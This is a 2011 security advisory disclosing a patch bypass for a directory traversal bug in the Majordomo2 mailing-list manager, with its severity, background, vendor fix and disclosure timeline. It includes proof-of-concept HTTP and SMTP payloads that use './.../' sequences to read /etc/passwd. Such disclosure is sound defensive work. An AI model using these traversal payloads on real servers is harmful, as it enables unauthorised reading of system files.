______________________________________________________________________ -------------------------- NSOADV-2011-003 --------------------------- Majordomo2 'help' Command Directory Traversal (PATCH BYPASS) ______________________________________________________________________ ______________________________________________________________________ 111101111 11111 00110 00110001111 111111 01 01 1 11111011111111 11111 0 11 01 0 11 1 1 111011001 11111111101 1 11 0110111 1 1111101111 1001 0 1 10 11 0 10 11 1111111 1 111 111001 111111111 0 10 1111 0 11 11 111111111 1 1101 10 00111 0 0 11 00 0 1110 1 1011111111111 1111111 11 100 10111111 0 01 0 1 1 111110 11 1111111111111 11110000011 0111111110 0110 1110 1 0 11101111111111111011 11100 00 01111 0 10 1110 1 011111 1 111111111111111111111101 01 01110 0 10 111110 110 0 11101111111111111111101111101 111111 11 0 1111 0 1 1 1 1 111111111111111111111101 111 111110110 10 0111110 1 0 0 1111111111111111111111111 110 111 11111 1 1 111 1 10011 101111111111011111111 0 1100 111 10 110 101011110010 11111111111111111111111 11 0011100 11 10 001100 0001 111111111111111111 10 11 11110 11110 00100 00001 10 1 1111 101010001 11111111 11101 0 1011 10000 00100 11100 00001101 0 0110 111011011 0110 10001 101 11110 1011 1 10 101 000001 01 00 1010 1 11001 1 1 101 10 110101011 0 101 11110 110000011 111 ______________________________________________________________________ ______________________________________________________________________ Title: Majordomo2 'help' Command Directory Traversal Severity: Medium Advisory ID: NSOADV-2011-003 CVE: CVE-2011-0063 Found Date: 03.02.2011 Date Reported: 03.02.2011 Release Date: 19.02.2011 Author: Nikolas Sotiriu Mail: nso-research at sotiriu.de Website: http://sotiriu.de/ Twitter: http://twitter.com/nsoresearch Advisory-URL: http://sotiriu.de/adv/NSOADV-2011-003.txt Vendor/Project: http://www.mj2.org/ Affected Products: majordomo2 <= 20110203 Remote Exploitable: Yes Local Exploitable: No Patch Status: Vendor released a patch (See Solution) Discovered by: Nikolas Sotiriu Disclosure Policy: http://sotiriu.de/policy.html Thanks to: Thierry Zoller: For the permission to use his Policy Background: =========== Majordomo 2 is an upwardly-compatible rewrite of the popular majordomo mailing list manager software by Jason Tibbitts and Michael Yount. Description: ============ Majordomo2 <= 20110203 is affected by a Directory Traversal vulnerability due to parameter 'extra' of the 'help' command in the function '_list_file_get()' is not properly sanitized. The original bug was made public on 03.02.2011 by Michael Brooks of sitewat.ch: https://sitewat.ch/en/Advisory/View/1 https://bugzilla.mozilla.org/show_bug.cgi?id=628064 I discovered, that the patch, which is in the CVS since version 20110125 don't protect against the Directory Traversal bug. https://bug628064.bugzilla.mozilla.org/attachment.cgi?id=506481 The diff build in the regex '$file =~ s!/?\.\./?!!g;', which deletes '../' from $file. Bypassing this regex is quiet simple by using './.../' insted '../'. Proof of Concept : ================== HTTP: http:///cgi-bin/mj_wwwusr?passw=&list=GLOBAL&user=&func=help& extra=./..././..././..././..././..././..././..././.../etc/passwd SMTP: help ./..././..././..././..././..././..././..././.../etc/passwd Solution: ========= Update to Majordomo2 >= 20110204 http://ftp.mj2.org/pub/mj2/snapshots/2011-02/majordomo-20110204.tar.gz References: =========== Sitewatch Advisory: https://sitewat.ch/en/Advisory/View/1 Original Bug: https://bugzilla.mozilla.org/show_bug.cgi?id=628064 Patch Bypass: https://bugzilla.mozilla.org/show_bug.cgi?id=631307 Disclosure Timeline (YYYY/MM/DD): ================================= 2011.02.03: Patch bypass vulnerability found 2011.02.03: Informed security [at] mozilla.org 2011.02.03: Mozilla opend Bug 631307 in bugzilla 2011.02.03: Jason Tibbitts comitted a fix (Sorry again) 2011.02.04: Snapshot available for download 2011.02.04: Discuss the public disclosure 2011.03.04: Got the Bug Bounty Money 2011.03.08: Release of Advisory